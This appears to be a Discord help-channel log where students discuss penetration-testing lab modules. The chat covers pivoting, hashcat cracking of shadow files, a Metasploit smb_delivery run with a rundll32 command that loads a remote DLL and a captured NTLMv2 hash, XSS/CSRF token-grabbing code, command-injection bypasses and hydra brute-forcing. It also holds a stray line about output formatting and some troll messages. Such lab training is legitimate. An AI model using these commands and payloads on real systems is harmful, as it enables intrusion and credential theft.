Also wrap the output in triple backticks for easier parsing

the snmp port is closed but trying this port is a guess once they use pop3 and imap?

Snmp isn't closed, or it shouldn't be, just need the right string

Read the engagement, it gives you a fairly good reason to guess snmp

"Management Server"

the main target 172.16.6.155 is in the same subnet I am trying to ping it but no response

It's not

the sub mask is 16

If it was the gateway would be 172.16.0.1

Not 172.16.5.1

Check route print

tks

Interface List
  9...00 50 56 b9 e8 a2 ......vmxnet3 Ethernet Adapter
  4...00 50 56 b9 09 b8 ......vmxnet3 Ethernet Adapter #2
  1 Software Loopback Interface 1
IPv4 Route Table
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       172.16.5.1     172.16.5.150    271
          0.0.0.0          0.0.0.0       10.129.0.1    10.129.42.198     15
       10.129.0.0      255.255.0.0         On-link     10.129.42.198    271
    10.129.42.198  255.255.255.255         On-link     10.129.42.198    271
   10.129.255.255  255.255.255.255         On-link     10.129.42.198    271
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
       172.16.0.0      255.255.0.0         On-link      172.16.5.150    271
     172.16.5.150  255.255.255.255         On-link      172.16.5.150    271
   172.16.255.255  255.255.255.255         On-link      172.16.5.150    271
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link      172.16.5.150    271
        224.0.0.0        240.0.0.0         On-link     10.129.42.198    271
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link      172.16.5.150    271
  255.255.255.255  255.255.255.255         On-link     10.129.42.198    271
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       172.16.5.1  Default

No links to 172.16.6.x

nope

You're missing a middleman host, literally reread the section and it'll click

Idk why you're being persistent about this.

I am entirely correct

I have completed this module

I even missed the same thing my first time

Re-read and it clicked

There's a middle host with another user

I am not doubting you I just cannot find it but I will check again

The ip will be 172.16.5.x

yep got it

yo marcie. Have you done the skill assesment for Attacking Common Applications

Haven't touched common apps

I was just going on the ip for the task

Which is the last hop in the chain

and never did a check for the one in the section

I tried using ligolo and doing a ping sweep nothing popped up yet

so I was confused

There's a reason I phrased a -> b -> c

If you're using ligolo you don't need to do the rdpoversocks thing

yea but I wanted to try rdp

¯_(ツ)_/¯

when i could not so I thought of doing it with ligolo then rdo

Either way. You looked over a step in the chain. (Which the section gives you creds for)

Bc this section is mostly about double pivots

Also you can rdp through ligolo

As a just FYI :)

Thanks for helping me

so I was doing and my instance got expired going to try tomorrow

85% done now with the cpts. i think i was at 70% on friday and now i feel like i can see the devil

Right there with you. Down to windows privesc, report, and enterprise modules

Are there any sorts of sites where you can have a url for a short amount of time (kinda like a temporary email) and see all the traffic that goes to it? Seem to remember using one for a module ages ago.

Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Bypassing CSRF Tokens via CORS Misconfigurations

I'm struggling with my payload and would really appreciate some help if someone was offering. I seem to be struggling with even grabbing the token value.

Hello everyone, I'm currently working on the SOC Analyst path and I seem to have difficulties on the Windows Event Logs and Finding Evil. In section "Tapping into ETW" When I launch the attack and capture the log and I review the etw.log I cannot find the answer it is asking for. I am using CTRL F to match the similarity on the what the screenshot shows but get no results. Can anyone assist?

https://webhook.site/

awesome, exactly was I was looking for. thanks!

you can also use ngrok

but yeah

alg, was attempting some oob sqli but didn't really work. thanks tho

I had the same issue, to me it almost seems like the format has changed since it was released. I used a powershell command to search for the string 'Seatbelt', saved it to a file and searched for 'ManagedInterOp' or whatever the string is that's next to the answer (blacked out on the screenshot)

@next bronze @tranquil axle good news and bad news everyone else is having a hard time 💀

So we are gonna email prof

Do you remember what command you used?

PASSWORD ATTACKS >>> Passwd, Shadow & Opasswd
>>> Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

I was able to transfer the shadow.bak and passwd.bak file from target machine to attack machine and unshadowed both files to file called "unshadowed.hashes". I'm stuck on trying to crack the hash based on given resource folder in HTB but it fails for some reason. Can someone help who went through same module?

I'm not good at powershell so I just googled how to do it. Essentially I was trying to cat out the file and grep "seatbelt" so that I could have a smaller file to search for the answer. If you need more guidance feel free to DM me.

good, your prof should stop smoking whatever they were smoking

I hope yall can get the point across that that module requires knowledge of all the previous modules, or at least get them to do the lab themselves

Hey all, can someone please assist on my question I have been stuck on it for 2 weeks now

https://academy.hackthebox.com/module/147/section/1322
this module requires kira password, anyone remember when did we attack kira lol

use a mutated loveyou list

i remember now but can not find that section :((

the kira thing is in a hint I think the original password was Iloveyou1 in the hint.

yeah i think it was loveyou1 or smth

i spent a lot of time trying to look for that question too lmfao

You have to use hashcat -m 1800 thereeh section covers it under linux local password attacks

also don't use rockyou.txt

I used that

use the mutated list for the passwords from the module to crack the hash

but the output says exhaused with by customizing the given password file in module

mutate the password list

I have mutated the password list and the outcome of hashcat is "Exhausted". I can't find what is wrong leading me to that error

well I can say the same too

im retaking the steps as advised and get back to you in few minutes

can anyone please help me with Advanced Deserialization Attacks - Example 1: JSON.. I have a payload but unable to get a shell (edited)

is uploading pic snips disabled?

anyone having issues spawning a target right now?

So below are the commands I ran, let me know if find any problems:

hashcat --force password -r custom.rule --stdout | sort -u > mutated.txt

hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o file.cracked

Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: mutated.txt
* Passwords.: 94044
* Bytes.....: 1034072
* Keyspace..: 94044
* Runtime...: 0 secs

Approaching final keyspace - workload adjusted.  

                                                 
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: unshadowed.hashes
Time.Started.....: Fri Jan 19 03:08:02 2024 (1 min, 27 secs)
Time.Estimated...: Fri Jan 19 03:09:29 2024 (0 secs)
Guess.Base.......: File (mutated.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2118 H/s (5.65ms) @ Accel:16 Loops:1024 Thr:1 Vec:4
Recovered........: 2/4 (50.00%) Digests, 2/4 (50.00%) Salts
Progress.........: 376176/376176 (100.00%)
Rejected.........: 0/376176 (0.00%)
Restore.Point....: 94044/94044 (100.00%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4096-5000
Candidates.#1....: yellow93 -> Yellow99!

Started: Fri Jan 19 03:08:01 2024
Stopped: Fri Jan 19 03:09:30 2024

yes

shout out for @misty current for nice hint

I don't fully understand the question. I found a couple different possible answers but none of them seem to work

This is the footprinting smb module

rpcclient

hi i'm facing problem when try sed -i, can u help me ?

what do you see in file.cracked?

file.txt didnt get created on Desktop

I assume because the hashcat wasnt successful and hence the file.txt wasn't created

you're supposed to steal passwd.bak, shadow.bak, then unshadow, use the hashcat command to crack the file, and it should be in your home directory in your attack box

the -o specifies the output file.cracked, which you should be able to cat out.

in that file there will be new hashes, one for root which you crack using any tool of your choice

thank you so much

so I did transfer the passwd.bak and shadow.bak by using scp to target machine

it should be on your machine, not the target

Im sorry I meant attack machine

I trasnferred it to attack machine

yes good, now you can unshadow and crack it with the mutated list

lol I did unshadow:

unshadow passwd.bak shadow.bak > ~/Desktop/unshadowed.hashes

okay now just crack it with hashcat using the command from before the output file is file.cracked and it should be in the location you ran hashcat from

if you are truly lost as to where file.cracked is use locate file.cracked

even if hashcat status is Exhausted, you think file.cracked would be created?

No result:

locate file.cracked
locate: warning: database ‘/var/cache/locate/locatedb’ is more than 8 days old (actual age is 259.9 days)

you can't use locate without first updating the database, you should know where the file is saved, either in your current dir or the specified path

what's your hashcat command

@rustic sage I sent you some pictures for better visual input of my work

Maybe you can get the prof to showcase how one would do the lab as a „at the end of the class you understand how this is done“

1. So initially I transferred passwd.bak and shadow.bak from target machine by using scp

2. I unshadowed passed.bak and shadow.bak to file called unshadowed.hashes

3. then mutated password file given through module

4. Ran hashcat to crack the unshadow.hashes but it fails and gives "Exhausted" status

" hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o ~/Desktop/file.cracked "

so is there the ~/Desktop/file.cracked file

In your output above it said it removed 2 hashes from the input (because they were already cracked), I forgot the command but can’t you do —show or something with hashcat to see the pot of those?

oh didn't see they sent the output, yes use --show and don't need to specify the outfile

does anyone know this, im trying to install kernell on my fresh kali and i already got all the resourses im aware of and was able to downlaod it but then when doing the make command it takes like 30 min to compile and at the end it gives an error Makefile:234:__sub-make Error 2 when trying to make Kernel. anyone know what this means?

ive tried downlaoding diff versions and then tried re compiling like 5 times already

would that look like following:

hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o unshadowed.cracked --show

why don't you try it first

did it but didnt work

"didn't work" what type of error do you get?

if you scroll up in the terminal -> do you see the cracked ones

did the file unshadowed.cracked get created

note: the default output mode outputs hash:password so the password will be at the end of each hash it cracked

no the "unshadowed.cracked" does not get created after running hashcat

ok, what about my other questions; what error did you get (if any)

I dont get any error but hashcat shows "Exhausted" as status and does not populate a unshadowed.cracked

ok so scrolling up do the ones it did crack show in the terminal?

if you used --show hashcat wouldn't attempt to crack the hashes

do not dm me without asking

1. it's common courtesy
2. read #rules

and as I said don't specify the outfile

hashcat unshadowed.hashes --show -o unshadowed.cracked might work to give an output file

you don't need to, but it doesn't hurt

checking it

yeh but it's another step to find the file

the output should be just in the current directory

¯_(ツ)_/¯

Ok I got two hashes by running that on my persoal VM rather than pawnbox

Whats next now😭

well the hashes have a username attached to them

Guys someone plz help how to start my career in ethical hacker

GOT THE ANWER AFTER 2 WEEKS

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

2 weeks? geez

Give up bro😂

Why bro?

should say that about you since you had to be guided to the answer

bc you couldn't think of that on your own

Just kidding follow the HTB CPTS pathway and keep grinding

@rustic sage read this

Ok

As long as you try it never hurts

yes but you didn't even think to try

also if you didn't crack it in the pwnbox why would the hashes be loaded in the pwnbox fwiw

you said you got it with your own vm, why not stick to that

Also running pwnbox and the vpn on your own vm can (and does) cause connection issues to the targets

bruh giving hint/tips doesn't cost the person any money

Everybody is built with different thought process and approach problems

¯_(ツ)_/¯

your way works for you and someones work for them

i'm just givin you shit since you were ready to just throw "Give up" as a joke to someone that's new

¯_(ツ)_/¯

having someone helping you connect the bridge together is what people do not go off like you did my friend

joke is a joke bro

nah a joke is meant to be funny

a joke would have been "Turn on your computer"

or something along those lines

Telling someone "give up" is just offputting

Alright Professor McGonagall you win, have a good day/night😂 🤦‍♂️

don't spend another 2 weeks on the next bits ¯_(ツ)_/¯

Sounds very discouraging for a person who just ranted about not discouraging others

also fwiw don't forget to keep track of passwords in that module

depends on how you look at my statement

2 weeks sounds like you didn't reach out for assistance once what you were trying wasn't working

¯_(ツ)_/¯

Maybe if you were attentive in the channel then I'm sure you would have seen the comments for help

¯_(ツ)_/¯

for the previous sections

phrasing is also important

were you stuck for 2 weeks at that part, or the module itself

there's a HUGE difference

alright bruh don't know why your ranting so much rather than just accepting the joke and being quite unless if Im talking with disturbing 10 year old kid

if you don't want me to view you as silly for wasting 2 weeks on a single section over reasonable for the whole module ¯_(ツ)_/¯

but never the less you have good day my friend and hopefully your calmer till someones next question

lol you assume i'm upset/mad

besides i've helped loads of people with issues

https://tenor.com/view/spoken-reasons-john-baker-jr-popcorn-sit-watch-gif-15196796065915158972

after you complete the path i'd highly suggest you revisit this module to make sure you understand it if you're planning on tackling the exam

¯_(ツ)_/¯

that and the file transfers module

as you seemed to have issues previously with file transfers

halp

I think I deleted the flag

I'm working on the CRUD Api module, and I updated the london's entry to "Flag", deleted it, then deleted baltimore, but there's no flag

oop nvm

am hackerman and figured it out

Hii

Kya how h

Any one online

?

this isn't a gen chat

read #welcome

I did indeed accidentally delete the flag btw if curious

nice

Ok I am new in HTB can any oklne help me

No

thanks for deleting Baltimore; that city is a piece of shit anyway

no problem lmao

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

From where you are

sir

I'm from #general

you should visit it

i will repeat again: read #welcome on how to access more of the server

they'll have no access unless they follow instructions

oh rip

ye only a handful of channels are available if your account isn't linked

Yeah, I thought the instruction for the module were rename city to flag, delete city, then search for flag. But obviously it'd be deleted if I deleted it, so I just renamed mephis and it worked again

cuz faaaahhhkkkk mephis lol

IN WINDOWS PRIVILEGE ESCALATION - Windows server
I do the commands for smb_delivery but it does'nt open a session for me, instead it returns the hash for htb-student.. what is missing?
I tried to upload a screenshot but for some reason I can't add it to this channel.
my steps:
use exploit/windows/smb/smb_delivery
set srvhost 10.10.....
exploit
and in windows machine in cmd: rundll32.exe \10.10....\aZaOLL\test.dll,0
it gives me that:

[SMB] NTLMv2-SSP Client : 10.129.97.145
[SMB] NTLMv2-SSP Username : WINLPE-2K8\htb-student
[SMB] NTLMv2-SSP Hash : htb-student::WINLPE-2K8:bb99524dcf3917d1:b4a699ffc6ddbd9a317217b1b6e6cb34:010100.... (shortened it..)

sessions

Active sessions

No active sessions.

Hashes are great

They can be used for a lot

but it is the hash of htb-student, so I already have his password, no?

Yes

Are you sure you set the right options and used the right commands

yes.. tried like 10 times.. Its not what they wanted in the module.. they wanted a session, but it doesn't return one

is your LHOST correct?

yes - it is ifconfig tun0 right?

usually the issue is missing one step in the process

and yes tun0

can I send you screenshot in private? for some reason I can't send here

no

you need to verify your app.hackthebox.com account following instructions in #welcome to send screenshots here

and not have large codeblocks yeeted if you format them

ah ok thanks

spam protection type of thing

so skids and trolls don't spam the channel with nsfw/l images

there it is.. thanks

lhost isn't correct

"started reverse TCP handler on Public IP

that's the public IP of your pwnbox instance BTW

should be also ifconfig tun0?

yes

the targets don't have internet access; so they can't reach out to that public IP

changed, but I get the same result

idk then ¯_(ツ)_/¯

and you re-ran the exploit yeah?

yes sure.. ohh ok, thanks a lot anyway

by that i mean after adjusting the lhost to the correct IP; you ran exploit again?

Were you able to sort this out? I'm struggling on the same section.

Can someone confirm me that rdp almost all the time il pretty unusable? 😞

Use the tcp vpn

anyone know why my Available networks is greyed out in Kali. In my VM i made sure to pick Bridge and then on the usb I enabled my network usb too.

This isn't a support group for Kali

Might need the firmware

DM me

That’s better! Thank you!

can someone help me with the monitored htb box, please dm

Hi guys, anyone having the issue with this question.

Module name: WINDOWS ATTACKS & DEFENSE
Section name: Print Spooler & NTLM Relaying
Issue: Ambiguous answer format to 2nd Question

After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?.

No, read #welcome and follow instructions #1195788403384516738

Hello I have a problem this question normaly it is correct

Can you help me please

POST DATA request, you would need to URL encode the & or else it's gonna take it as a new parameter. Which Module is this?

COMMAND INJECTIONS
Identifying Filters

retype the &, a "&" in post body is the sign for a new parameter

select & and do ctrl+u

It should URL encode it for you.

did you see any output of whoami ?

no but in the question, I d just need receive a answer

I do

& is not the right answer then it seems

try something else , obviously & is not the right answer

idk what section that is but try another injection character

I was able to, you can dm me for help

what section is that?

use url encoded tabs instead of a space

doesnt that space in your payload break it?

hay mates. Thanks for the your help yesterday. i have now completed my first box. i just wanted to say that 🙂

I tested all posibility I don't find

Space as + maybe

Hello !
I am trying to solve the issue in Footprinting Lab - Med.

I am having an issue reading the directory after NFS mounting

I tried chmod 777

But it is still ( Permission is denied )

I tested also

sometime rdp machine are very very laggy

what I can do to make less lag?

btw I am running those rdp machine from htb academy attack box, will it be less laggy if I run those rdp machine from my local vm?

theres three it mentions in that question, just try all of them

newline doesn't work in urls as \n though, so use url encoding (%0a)

or & and |

I cannot get this fourth skills assessment question...any hints?

Hello, is here any support? I dont get the password reset sent to my email adress?

check spam,thrash

I did already

uhmm so any idea?

contact support liam

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

In the module Advanced XSS and CSRF Exploitation, section xss bypass.
I have a working xss payload tested in chrome and firefox, with exfiltration.
However I get no response or interaction from the "admin" user.
At first I thought the URL might be too long with the html response so I just sent /x, but that didn't change anything.
solved it, for everyone else with this issue, ||this is the first time ports matter for the admin||

I feel like Completing the Windows privilege escalation module prior to tackling the Attacking and Enumerating Active Directory modules would have been significantly beneficial for the second skills assessment haha

Make sure, you are root before mounting the nfs

Hey, i want to ask which one is better ... using the pwnbox with the modules in academy for the labs or i should fire up my own Kali Linux VM?

Own

hello

i was doing shells and payloads module and i am stuck in Antak-WebShell part

i am not able import aspx file

but according to walkthrough it should work

but in vhost it is throwing an error to only upload .zip or tar.gz file

15 mints back i was able to upload aspx file when I was doing laudanum path

anyone remember the module name in which we have to perform phisphing attack , creating lnk file. Not able to find that section

are you confusing it with the oscp course

🤔 lol

doing it manually is lame, check out the netexec slinky module
https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky

Two modules teach you that

1. https://academy.hackthebox.com/module/details/232
2. https://academy.hackthebox.com/course/preview/using-crackmapexec

is the Browser instance more powerful then my Kali VM? on academy ?

Any quick fix for machines not spawning in Attacking common applications (osTicket and gitlab) Propably other ones too

Sorry i got confused with the oscp course 🙂

• For NTLM Relay Attacks, it is it taught in: Framing Hashes
• For CME, it is taught in: Stealing Hashes

depends on how much resources you're giving your vm

the intro to assembly module is killing me lol

i have a powerful RIG

so i just don t know which one to play around for long term use

Lol both the modules are locked for me

it's always better to use your own vm, you get to keep your changes and use your configs

gotcha

tier 3 modules, but they're very good

and for password cracking its better to use the GPU to my knowledge. But i don t think i have the full performance on vm or do i?

nope, hashcat don't have access to the gpu in a vm, run it on your host

Personally I use hashcat on my main computer (windows) its same in windows and linux and you can download it from their website

Gotcha lads

GPU cracking is like 40x faster for me

if you have the optimal wordlist of course

hashcat will always be faster with a gpu, that's what it's designed for

Depends on the hashtype and how much power your gpu has, wordlist has nothing do with it

i see

I'm currently doing the Nibbles Module for the CPTS exam. And I want to use my own VM instead of the PwnBox. But I cannot ping the target. I just get:
$ ping 10.129.172.48
PING 10.129.172.48 (10.129.172.48) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
From 10.10.16.1 icmp_seq=2 Destination Host Unreachable
From 10.10.16.1 icmp_seq=3 Destination Host Unreachable
From 10.10.16.1 icmp_seq=4 Destination Host Unreachable
From 10.10.16.1 icmp_seq=5 Destination Host Unreachable
From 10.10.16.1 icmp_seq=6 Destination Host Unreachable
From 10.10.16.1 icmp_seq=7 Destination Host Unreachable
From 10.10.16.1 icmp_seq=8 Destination Host Unreachable
From 10.10.16.1 icmp_seq=9 Destination Host Unreachable

Anyone else had this issue?

My OpenVPN looks fine, It does not return any errors.

give it a bit to spawn, if not reset

Thanks a lot, I'll try!

your vpn is fine since you can reach the router

yeah exactly, i've never had issues with it on reguarly machines.

reset worked!

So I'm stuck in the intro to assebmly module debugging with GDB section for 2 days. The question is asking find the hex value of "rax" when we reach the instruction at <_start+16>. I set a breakpoint at that address and step to <_start+16>. Then attempt to read it with x/$rip and it spits out a hex value. But it's not correct. Any advice on what I'm doing wrong?

read the question carefully, which register should you be looking at?

your a life saver.

Hello I have a problem with this paylaod... I think is my pipe | but I test two possibility and it is not ok.... can you help me please ?

why i dont find my "downloads" directory? following some guide and i dont have it

Does anyone now a way to get remote code execution on a Nagios XI server if you have the admin account on the webapp???

this is not the place to ask, read #welcome to get verified and ask in the appropriate channel

Hi! I've terribly stuck on a question about "for loop" and decoding a hash code. Can anyone help me?
https://forum.hackthebox.com/t/introduction-to-bash-scripting-hack-the-box-academy/243473/30?u=glebius

?? the answer is right there

idk it doesn't accept 34071 and I've tried hints from the thread

that's not what the question asked for

Yo guys, so I'm currently doing the skills assessment for SQLMap, I found sql injection and I was able to exploit it. The thing is once I dump the specified table(Final_flag). I get
<blank>
in the
content
column(Where the flag is supposed to be). I'm dumping the whole database right now but because it's time-based SQLi, it may take a while. I was wondering if anyone has any trouble with the skills assessment? I also restarted the machine multiple times

Uhm... I'm confused even more, it's said the number of characters in 28th hash must be assigned to "salt"

yes, and you have already done that

take a wild guess what the answer is from your output

So the script is correct, the answer is right here, but I don't see it, right?

Still no idea what it is. Thought maybe I should write the loop in the answer

it could not be more obvious, like I said take a wild guess what the answer is from your output

also helps to understand your own code

maybe I remember why..if you read again the things in the sql injection module you should find an option for sqlmap that could solve the problem..I don't wanna spoil too much

I'm going out for like 30 minutes..if you can't find a solution, you can dm me later

I see, thank you. I've changed a code slightly and couldn't see the answer now. Stuck on it for 2 days lol

the answer is literally in your post

Yes, I've found it! I couldn't see because I've changed the code and it was giving out slighlty different error afterwards. Thanks again

Thanks never mind, I just had to restart the machine 5+ times and it worked, I'm not a 100% sure why though

I suggest you break the one command in steps. The whole command base64 doesn't work. But breaking it into steps, and base64 encoding each piece of the step, sending multiple requests instead of one big chunk worked for me.

Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Bypassing CSRF Tokens via CORS Misconfigurations

I'm struggling with the payload creation in this module and would welcome feedback. Copying the module's payload directly doesn't work; at first I thought it was an issue with just variable/parameter renaming, but then I broke it down to just the first half that's presented:

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb/profile.php', false);
xhr.withCredentials = true;
xhr.send();
console.log(xhr.responseText);  //I added this for debugging
</script>

And went and clicked "View Exploit" and noticed the following console error:

So I'm realizing that the /profile.php endpoint isn't ever getting loaded by the request, hence why I'm not able to grab/pass the CSRF token.

But I'm not sure what the fix is meant to be

Would welcome feedback.

Hello, I wanted to know if I was the only one whose rdp on Windows machines of the Academy is really slow and crash really often.
If someone found a solution for this I'm not against it.

Understanding Log Sources & Investigating with Splunk
Skills Assessment

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe

Can someone dm me I got the answer but I haven't got it the right way it was just luck. So if someone can help me on how to search that it would be nice 🙂

DM me.

Hi everyone

Hi Everyone, quick question. For the SIEM module question : Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Admin users only]" visualization, if it is available, so that it includes failed logon attempt data where the username field contains the keyword "admin" anywhere within it. What should you specify after user.name: in the KQL query?
I tried admin, *admin its not taking it. It works in Elastic search platform but not sure why the answer is not accepted. Any ideas ?

I understand it wants me to specify "admin only" and admin or *admin does that so not sure why HTB isnt taking the answer 🤔

anyone else having problems using ssh to connect to boxes it worked the first time i did it now it keeps saying connection closed by [adresss] port 22

helloi'm new here

Hey all, can anyone point me in the right direction with the bizzness machine

I refuse to believe that the only solution to it is bruteforce XD

This is unrelated to the channel

Read #welcome on how to access more of the server

so i was hacking he nibble box, and had my port 8080 open, to make af file transfer to my target hos, when i suddenly get a surprise connection. someone else connected to me! the connection was made by www.whitehouse.gov:443. super wired. have anyone of you guys tried something similar ?

Pwnbox has its interfaces open to the internet. Still funny though

someone played the reverse uno card on me

can someone help me

Im doing web requests HTB academy section POST and im having issues

I’m sure since you asked such a detailed question someone can help

let me get to it

I am trying to get the server_ip file to populate in the network tab, and nothing is showing up. only a bunch of CSS and PHP files

ive tried clearing, and redoing it probably 10 times now and nothing

any idea why that might be?

wait i might be stupid, give me one moment

Chat: is he stupid

Yo wassup y'all

I been wondering how y'all be getting them robux

can y'all help me hack robux

Not the place

Read #welcome and #rules

😦

Can you shut the fuck up ? You're not a cool 666Hacker Skibidi sigma

I'm telling you this isn't the server you're looking for

It is, I know my places

You're just not a SkibidiToiletSigmaAmogusSussyBaka666HackerSigma

No, you don't

yea. i am actually lost, woul be cool to get a hand 🙂

This isn't a robux hacking server

Spitie toilet, spibkidi skpitie toielt.

Haven't done this module lol

It is a hacker server

@solid python prank 'em john

its super simple, im just not getting the data i need

I'm about yo hack mee6 and turn him black

OK kid have fun

and take over the server with pop smoke and snoopdog my beloved

Omg it's "HIM"

are you acoustic

Not the server for this

anyways how di hack mind craft

<@&861185840277487616>

Google

Mo..?

im srory

bu are you are you estarted

who would win mine craft steve or goku or sglitch skibdi toilet titan

Yes

are you restarted

skibiditte doitlette wins bro

grrrr!!!

<@&861185840277487616> got a 2 for 1

It's a 2fer1 combo

https://tenor.com/view/2birds1stone-kill-two-birds-one-stone-fall-gif-16421754

you guys have patience for sure 😄

I mean I'm not here often, but all the time there's some idiots messing around

Patience? Nah just ability to recognize trolls

i’ll go with sglitch skibdi toilet titan

im just trying to seek help

Sorry, you got hit in the face with the dumb train when asking for help

What have you tried?

All the task is, is to get a server request to populate in the network tab on dev console but im getting different results than the academy guide

unless i do have it and am just confus3d

howx ytod i Get clash ropyalke ?

i hate

ty

You're not always gonna get the same thing as the example

same man

@jolly cradle hey guess what ^

ok ill try one thing then ask for more help

<@&861185840277487616>

There's huge bot/troll campaigns going on rn btw @jolly cradle

They're targeting public servers

👀

if only there was a method to prevent randos from accessing channels without verification to add an additional layer of effort to dissuade opportunistic trolls

Might wanna park for a bit until it blows over

Ah. Cringe.

Too difficult

You're too slow old man

They're all JJK themed I hate it

why tf do people waste there time with that crap

Sociopathy

Bored teenagers

brain worms

ahhhh i think i figured i out

Question regarding "Kerberos Attacks: Constrained Delegation Overview & Attacking from Windows":

1. Under "Abuse Any Service", the attack being referred to is the only option because Constrained Delegation is enabled with Use Kerberos Only within the properties of the service account?
2. Under "Impersonate Any User", the attack referred to is only available because Constrained Delegation is enabled with Use any authenticaiton protocol within the properties of the service account?

Hey guys, on the linux privilege escalation module, sudo section, I keep trying to run the git clone command for the exploit but it keeps return 'could not resolve host: github.com' is this an internet problem?

the target machines are not connected to the internet

Yooo, do you guys also experience that the boxes in the academy modules are "slow" or laggy? It's pretty random. Sometimes it give me huge 25 second delays and then its snappy for 25 seconds and then the delays again. Is there a fix?

Id reach out to our customer support team who can look into the issue for you

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Thanks, I wrote to them yesterday and still no answer

it's pretty hard to edit in VIM when the cursor keeps flying everywhere xd

what is wrong with this command?? keeps giving me an error .... curl -X POST -d '{"search":"Flag:}' -b 'PHPSESSID=68v86efjbp2eaen62v4uuco0f1t' -H 'Content-Type: application/json' http://83.136.250.104:45684/search.php

wrong JSON syntax, use double quotes for the key and value pair.

Might be why.

still says no URL specifed

If I cant connect to the internet how am I supposed to run the exploit?

by transfering it

I think there's a flag to specify the website

isnt it a url?

Or try putting the url first then the flags

python3 -m http.server - host wget host_ip:8080/file.txt - target

err ip

Ip and url can be interchangeable

hmm im following an example to see my errors and its the same

hmmm let me try one more thing

anyone?

do i use double quotes everywhere quotes are needed or just single quotes? im using regular windows command prompt?

You. Never closed the quote btw after Flag:

:Ooooo

you are right

Rami3l hinted that your json request was wrong btw

Yes was just confused what he meant

I was following another person on medium when I got stuck

... {a:b} is json

Why are you following a medium article, 1, and two - it's likely the section showed you what to do

Because I was confused about what academy was showing me so I googled….

My b

Most of the modules are pretty decently written, especially the intro ones,

Hi I’m in password attacks - password mutations …. I’m like 3 hours and still no luck any recomendación ?
I did split the file in 16 parts keep waiting ? 🥲

Guess I’m just not very smart then

Don't attack ssh

I did tried ftp with >= 10 characters but no result eather

Don't specify anything except threads

-t 48

I got it on the forum

what's your command?

I keep waiting update y late hahaha maybe 3 hours more 🫠

It shouldn't take 3 hours

Reset the target lol

Hydra -l sam -P segmenN ftp Ip -t 48

Segment

The fuck is that -P? Is that what you called the password list?

Bc you don't need to segment it

It's completely doable without splitting it

-P is for the password list and segments are the splits

Don't split

Hmm ok

Fuck off

Wtf

<@&861185840277487616>

I reset and try it again no splitting

No advertising #rules

Ok

Tens marcie

Should be~ 5-10 minutes maybe a bit longer

hecker

Hello mate

hello master

Do people really fall for this?

Unfortunately

yes sadly

Ok tkns 🤙

my password is hunter2

I only see *******

Oh neat

I didnt know Discord had a feature that hides passwords as asterisks

User safety is important

new update, lets see the github creds too

My github password is 12345

https://tenor.com/SL7z.gif

I love spaceballs

Unfortunately no sequel

Very unfortunate

I was looking forward to Spaceballs 2: The Search for More Money

I thought it was the quest for more money

https://tenor.com/view/yogurt-spaceballs-mel-brooks-merchandising-gif-20198466

For the sudo module on Linux Priv Esc sudo section, for some reason I cant run sudo -l without it prompting me for a password, any reason why? I tried running the hax me a sandwich exploit but that didnt work either

Does anyone know the difference between Kerberos Contrained Delegation attacks where Constrained is set vs Constrained w/ Protocol Transition is set?

can someone help with the windows privilege escalation module for the citrix breakout section?

with protocol transition the service can request a TGS for any user

And is that because the TGS ticket isn't forwardable when using S4U2Self to obtain the TGS ticket? If Protocol Transition isn't enabled I mean

its because with protocol transition enabled its not guranteed the original user(that the service is supposed to be requesting on behalf of) even has a kerberos ticket of their own. And a TGT is kinda needed for a TGS to be requested normally. Protocol transition is the DC handwaving the TGT requirement and just trusting the service.

Good explanation, thank you!

np

Kerberos Attacks module is awesome btw

Kerberos is like "oh you're that service? Cool you're good to go"

Better than ADCS? need a recommendation, not so good with constrained delegation and all.

ntlmrelay attacks module too is fighting for my cubes lmao

it really is, it's helping me understand Active Directory Enumeration & Attacks better.

More like, "Oh hi mr. service! Oh user needs to access something? Well I dont have a record of them asking because kerberos is stateless. You dont have any proof this user needs the service? Well normally id be displeased with you mr. service but protocol transition is enabled so imma let it slide this time."

havnt done ADCS module yet so idk

So I would have to wait for an actual request to come through from an actual user or use the Printer Bug (maybe?) to force the user to authenticate to the service I want to access?

that I have no clue yet

im halfway through the module, busy with work and life

ah ok, nw. Thanks anyway 🙂

my recommendation would be Kerberos Attacks first, then ADCS, then anything else

im still stuck

its saying a valid authentication cookie is required now

curl -X POST -d '{"search":"Flag"}' -b 'PHPSESSID=jj4kcovqpslp8h79627945dbcq' -H 'content-Type: application/json' http://94.237.63.93:30436/search.php

Seems like your cookie is not valid

the PHPSESSID?

Yes

maybe i miss typed let me check

ah yes i did

